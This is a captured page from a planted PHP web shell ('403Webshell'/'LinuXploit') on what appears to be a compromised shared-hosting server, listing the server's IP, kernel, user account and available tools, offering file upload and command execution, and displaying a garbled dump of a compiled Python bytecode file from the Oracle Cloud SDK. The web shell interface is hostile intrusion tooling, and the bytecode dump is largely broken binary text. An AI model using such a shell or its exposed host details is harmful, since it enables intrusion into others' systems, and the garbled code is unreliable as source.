403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib/python3.9/site-packages/oci/data_integration/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.9/site-packages/oci/data_integration/models/__pycache__/workspace.cpython-39.pyc
a

���f`�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@sFeZdZdZdZdZdZdZdZdZ	dZ
d	Zd
ZdZ
dd
�Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zed d!��Zejd"d!��Zed#d$��Zejd%d$��Zed&d'��Zejd(d'��Zed)d*��Zejd+d*��Zed,d-��Zejd.d-��Zed/d0��Zejd1d0��Zed2d3��Zejd4d3��Zed5d6��Zejd7d6��Zed8d9��Zejd:d9��Zed;d<��Z e jd=d<��Z ed>d?��Z!e!jd@d?��Z!edAdB��Z"e"jdCdB��Z"edDdE��Z#e#jdFdE��Z#dGdH�Z$dIdJ�Z%dKdL�Z&dMS)N�	Workspacea3
    A workspace is an organizational construct to keep multiple data integration solutions and their resources (data assets, data flows, tasks, and so on) separate from each other, helping you to stay organized. For example, you could have separate workspaces for development, testing, and production.
    �CREATING�ACTIVE�INACTIVE�UPDATING�DELETING�DELETED�FAILED�STARTING�STOPPING�STOPPEDcKs�dddddddddddddddddddd�|_ddd	d
ddd
ddddddddddddd�|_d|_d|_d|_d|_d|_d|_d|_d|_	d|_
d|_d|_d|_
d|_d|_d|_d|_d|_d|_d|_dS)a�
        Initializes a new Workspace object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param vcn_id:
            The value to assign to the vcn_id property of this Workspace.
        :type vcn_id: str

        :param subnet_id:
            The value to assign to the subnet_id property of this Workspace.
        :type subnet_id: str

        :param dns_server_ip:
            The value to assign to the dns_server_ip property of this Workspace.
        :type dns_server_ip: str

        :param dns_server_zone:
            The value to assign to the dns_server_zone property of this Workspace.
        :type dns_server_zone: str

        :param is_private_network_enabled:
            The value to assign to the is_private_network_enabled property of this Workspace.
        :type is_private_network_enabled: bool

        :param freeform_tags:
            The value to assign to the freeform_tags property of this Workspace.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this Workspace.
        :type defined_tags: dict(str, dict(str, object))

        :param description:
            The value to assign to the description property of this Workspace.
        :type description: str

        :param display_name:
            The value to assign to the display_name property of this Workspace.
        :type display_name: str

        :param compartment_id:
            The value to assign to the compartment_id property of this Workspace.
        :type compartment_id: str

        :param time_created:
            The value to assign to the time_created property of this Workspace.
        :type time_created: datetime

        :param time_updated:
            The value to assign to the time_updated property of this Workspace.
        :type time_updated: datetime

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this Workspace.
            Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param state_message:
            The value to assign to the state_message property of this Workspace.
        :type state_message: str

        :param id:
            The value to assign to the id property of this Workspace.
        :type id: str

        :param endpoint_id:
            The value to assign to the endpoint_id property of this Workspace.
        :type endpoint_id: str

        :param endpoint_name:
            The value to assign to the endpoint_name property of this Workspace.
        :type endpoint_name: str

        :param registry_id:
            The value to assign to the registry_id property of this Workspace.
        :type registry_id: str

        :param workspace_properties:
            The value to assign to the workspace_properties property of this Workspace.
        :type workspace_properties: dict(str, str)

        �str�boolzdict(str, str)zdict(str, dict(str, object))Zdatetime)�vcn_id�	subnet_id�
dns_server_ip�dns_server_zone�is_private_network_enabled�
freeform_tags�defined_tags�description�display_name�compartment_id�time_created�time_updated�lifecycle_state�
state_message�id�endpoint_id�
endpoint_name�registry_id�workspace_propertiesZvcnIdZsubnetIdZdnsServerIpZ
dnsServerZoneZisPrivateNetworkEnabledZfreeformTagsZdefinedTagsrZdisplayNameZ
compartmentIdZtimeCreatedZtimeUpdatedZlifecycleStateZstateMessager!Z
endpointIdZendpointNameZ
registryIdZworkspacePropertiesN)Z
swagger_typesZ
attribute_map�_vcn_id�
_subnet_id�_dns_server_ip�_dns_server_zone�_is_private_network_enabled�_freeform_tags�
_defined_tags�_description�
_display_name�_compartment_id�
_time_created�
_time_updated�_lifecycle_state�_state_message�_id�_endpoint_id�_endpoint_name�_registry_id�_workspace_properties)�self�kwargs�r;�I/usr/lib/python3.9/site-packages/oci/data_integration/models/workspace.py�__init__:svU��zWorkspace.__init__cCs|jS)z�
        Gets the vcn_id of this Workspace.
        The OCID of the VCN the subnet is in.


        :return: The vcn_id of this Workspace.
        :rtype: str
        �r&�r9r;r;r<r�s
zWorkspace.vcn_idcCs
||_dS)z�
        Sets the vcn_id of this Workspace.
        The OCID of the VCN the subnet is in.


        :param vcn_id: The vcn_id of this Workspace.
        :type: str
        Nr>)r9rr;r;r<r�s
cCs|jS)z�
        Gets the subnet_id of this Workspace.
        The OCID of the subnet for customer connected databases.


        :return: The subnet_id of this Workspace.
        :rtype: str
        �r'r?r;r;r<r�s
zWorkspace.subnet_idcCs
||_dS)z�
        Sets the subnet_id of this Workspace.
        The OCID of the subnet for customer connected databases.


        :param subnet_id: The subnet_id of this Workspace.
        :type: str
        Nr@)r9rr;r;r<r�s
cCs|jS)z�
        Gets the dns_server_ip of this Workspace.
        The IP of the custom DNS.


        :return: The dns_server_ip of this Workspace.
        :rtype: str
        �r(r?r;r;r<r�s
zWorkspace.dns_server_ipcCs
||_dS)z�
        Sets the dns_server_ip of this Workspace.
        The IP of the custom DNS.


        :param dns_server_ip: The dns_server_ip of this Workspace.
        :type: str
        NrA)r9rr;r;r<r
s
cCs|jS)z�
        Gets the dns_server_zone of this Workspace.
        The DNS zone of the custom DNS to use to resolve names.


        :return: The dns_server_zone of this Workspace.
        :rtype: str
        �r)r?r;r;r<rs
zWorkspace.dns_server_zonecCs
||_dS)z�
        Sets the dns_server_zone of this Workspace.
        The DNS zone of the custom DNS to use to resolve names.


        :param dns_server_zone: The dns_server_zone of this Workspace.
        :type: str
        NrB)r9rr;r;r<r"s
cCs|jS)z�
        Gets the is_private_network_enabled of this Workspace.
        Specifies whether the private network connection is enabled or disabled.


        :return: The is_private_network_enabled of this Workspace.
        :rtype: bool
        �r*r?r;r;r<r.s
z$Workspace.is_private_network_enabledcCs
||_dS)a
        Sets the is_private_network_enabled of this Workspace.
        Specifies whether the private network connection is enabled or disabled.


        :param is_private_network_enabled: The is_private_network_enabled of this Workspace.
        :type: bool
        NrC)r9rr;r;r<r:s
cCs|jS)a�
        Gets the freeform_tags of this Workspace.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. See `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this Workspace.
        :rtype: dict(str, str)
        �r+r?r;r;r<rFs
zWorkspace.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this Workspace.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. See `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this Workspace.
        :type: dict(str, str)
        NrD)r9rr;r;r<rUs
cCs|jS)a�
        Gets the defined_tags of this Workspace.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this Workspace.
        :rtype: dict(str, dict(str, object))
        �r,r?r;r;r<rds
zWorkspace.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this Workspace.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this Workspace.
        :type: dict(str, dict(str, object))
        NrE)r9rr;r;r<rss
cCs|jS)z�
        Gets the description of this Workspace.
        A detailed description for the workspace.


        :return: The description of this Workspace.
        :rtype: str
        �r-r?r;r;r<r�s
zWorkspace.descriptioncCs
||_dS)z�
        Sets the description of this Workspace.
        A detailed description for the workspace.


        :param description: The description of this Workspace.
        :type: str
        NrF)r9rr;r;r<r�s
cCs|jS)a&
        **[Required]** Gets the display_name of this Workspace.
        A user-friendly display name for the workspace. Does not have to be unique, and can be modified. Avoid entering confidential information.


        :return: The display_name of this Workspace.
        :rtype: str
        �r.r?r;r;r<r�s
zWorkspace.display_namecCs
||_dS)a"
        Sets the display_name of this Workspace.
        A user-friendly display name for the workspace. Does not have to be unique, and can be modified. Avoid entering confidential information.


        :param display_name: The display_name of this Workspace.
        :type: str
        NrG)r9rr;r;r<r�s
cCs|jS)z�
        Gets the compartment_id of this Workspace.
        The OCID of the compartment containing the workspace.


        :return: The compartment_id of this Workspace.
        :rtype: str
        �r/r?r;r;r<r�s
zWorkspace.compartment_idcCs
||_dS)z�
        Sets the compartment_id of this Workspace.
        The OCID of the compartment containing the workspace.


        :param compartment_id: The compartment_id of this Workspace.
        :type: str
        NrH)r9rr;r;r<r�s
cCs|jS)z�
        Gets the time_created of this Workspace.
        The date and time the workspace was created, in the timestamp format defined by RFC3339.


        :return: The time_created of this Workspace.
        :rtype: datetime
        �r0r?r;r;r<r�s
zWorkspace.time_createdcCs
||_dS)z�
        Sets the time_created of this Workspace.
        The date and time the workspace was created, in the timestamp format defined by RFC3339.


        :param time_created: The time_created of this Workspace.
        :type: datetime
        NrI)r9rr;r;r<r�s
cCs|jS)a
        Gets the time_updated of this Workspace.
        The date and time the workspace was updated, in the timestamp format defined by `RFC3339`__.

        __ https://tools.ietf.org/html/rfc3339


        :return: The time_updated of this Workspace.
        :rtype: datetime
        �r1r?r;r;r<r�szWorkspace.time_updatedcCs
||_dS)a*
        Sets the time_updated of this Workspace.
        The date and time the workspace was updated, in the timestamp format defined by `RFC3339`__.

        __ https://tools.ietf.org/html/rfc3339


        :param time_updated: The time_updated of this Workspace.
        :type: datetime
        NrJ)r9rr;r;r<r�scCs|jS)a�
        Gets the lifecycle_state of this Workspace.
        Lifecycle states for workspaces in Data Integration Service
        CREATING - The resource is being created and may not be usable until the entire metadata is defined
        UPDATING - The resource is being updated and may not be usable until all changes are commited
        DELETING - The resource is being deleted and might require deep cleanup of children.
        ACTIVE   - The resource is valid and available for access
        INACTIVE - The resource might be incomplete in its definition or might have been made unavailable for
                 administrative reasons
        DELETED  - The resource has been deleted and isn't available
        FAILED   - The resource is in a failed state due to validation or other errors
        STARTING - The resource is being started and may not be usable until becomes ACTIVE again
        STOPPING - The resource is in the process of Stopping and may not be usable until it Stops or fails
        STOPPED  - The resource is in Stopped state due to stop operation.

        Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this Workspace.
        :rtype: str
        )r2r?r;r;r<r�szWorkspace.lifecycle_statecCs gd�}t||�sd}||_dS)a�
        Sets the lifecycle_state of this Workspace.
        Lifecycle states for workspaces in Data Integration Service
        CREATING - The resource is being created and may not be usable until the entire metadata is defined
        UPDATING - The resource is being updated and may not be usable until all changes are commited
        DELETING - The resource is being deleted and might require deep cleanup of children.
        ACTIVE   - The resource is valid and available for access
        INACTIVE - The resource might be incomplete in its definition or might have been made unavailable for
                 administrative reasons
        DELETED  - The resource has been deleted and isn't available
        FAILED   - The resource is in a failed state due to validation or other errors
        STARTING - The resource is being started and may not be usable until becomes ACTIVE again
        STOPPING - The resource is in the process of Stopping and may not be usable until it Stops or fails
        STOPPED  - The resource is in Stopped state due to stop operation.


        :param lifecycle_state: The lifecycle_state of this Workspace.
        :type: str
        )
rrr	r
rrr
rrrZUNKNOWN_ENUM_VALUEN)rr2)r9rZallowed_valuesr;r;r<rs
cCs|jS)a!
        Gets the state_message of this Workspace.
        A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in failed state.


        :return: The state_message of this Workspace.
        :rtype: str
        �r3r?r;r;r<r 2s
zWorkspace.state_messagecCs
||_dS)a-
        Sets the state_message of this Workspace.
        A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in failed state.


        :param state_message: The state_message of this Workspace.
        :type: str
        NrK)r9r r;r;r<r >s
cCs|jS)z�
        **[Required]** Gets the id of this Workspace.
        A system-generated and immutable identifier assigned to the workspace upon creation.


        :return: The id of this Workspace.
        :rtype: str
        �r4r?r;r;r<r!Js
zWorkspace.idcCs
||_dS)z�
        Sets the id of this Workspace.
        A system-generated and immutable identifier assigned to the workspace upon creation.


        :param id: The id of this Workspace.
        :type: str
        NrL)r9r!r;r;r<r!Vs
cCs|jS)z�
        Gets the endpoint_id of this Workspace.
        OCID of the private endpoint associated with the container/workspace.


        :return: The endpoint_id of this Workspace.
        :rtype: str
        �r5r?r;r;r<r"bs
zWorkspace.endpoint_idcCs
||_dS)z�
        Sets the endpoint_id of this Workspace.
        OCID of the private endpoint associated with the container/workspace.


        :param endpoint_id: The endpoint_id of this Workspace.
        :type: str
        NrM)r9r"r;r;r<r"ns
cCs|jS)z�
        Gets the endpoint_name of this Workspace.
        Name of the private endpoint associated with the container/workspace.


        :return: The endpoint_name of this Workspace.
        :rtype: str
        �r6r?r;r;r<r#zs
zWorkspace.endpoint_namecCs
||_dS)z�
        Sets the endpoint_name of this Workspace.
        Name of the private endpoint associated with the container/workspace.


        :param endpoint_name: The endpoint_name of this Workspace.
        :type: str
        NrN)r9r#r;r;r<r#�s
cCs|jS)z�
        Gets the registry_id of this Workspace.
        DCMS Registry ID associated with the container/workspace.


        :return: The registry_id of this Workspace.
        :rtype: str
        �r7r?r;r;r<r$�s
zWorkspace.registry_idcCs
||_dS)z�
        Sets the registry_id of this Workspace.
        DCMS Registry ID associated with the container/workspace.


        :param registry_id: The registry_id of this Workspace.
        :type: str
        NrO)r9r$r;r;r<r$�s
cCs|jS)z�
        Gets the workspace_properties of this Workspace.
        key-value pairs of workspace properties


        :return: The workspace_properties of this Workspace.
        :rtype: dict(str, str)
        �r8r?r;r;r<r%�s
zWorkspace.workspace_propertiescCs
||_dS)z�
        Sets the workspace_properties of this Workspace.
        key-value pairs of workspace properties


        :param workspace_properties: The workspace_properties of this Workspace.
        :type: dict(str, str)
        NrP)r9r%r;r;r<r%�s
cCst|�S�N)rr?r;r;r<�__repr__�szWorkspace.__repr__cCs|durdS|j|jkS)NF)�__dict__�r9�otherr;r;r<�__eq__�szWorkspace.__eq__cCs
||kSrQr;rTr;r;r<�__ne__�szWorkspace.__ne__N)'�__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_CREATINGZLIFECYCLE_STATE_ACTIVEZLIFECYCLE_STATE_INACTIVEZLIFECYCLE_STATE_UPDATINGZLIFECYCLE_STATE_DELETINGZLIFECYCLE_STATE_DELETEDZLIFECYCLE_STATE_FAILEDZLIFECYCLE_STATE_STARTINGZLIFECYCLE_STATE_STOPPINGZLIFECYCLE_STATE_STOPPEDr=�propertyr�setterrrrrrrrrrrrrr r!r"r#r$r%rRrVrWr;r;r;r<rs�







































rN)Zoci.utilrrrZoci.decoratorsr�objectrr;r;r;r<�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit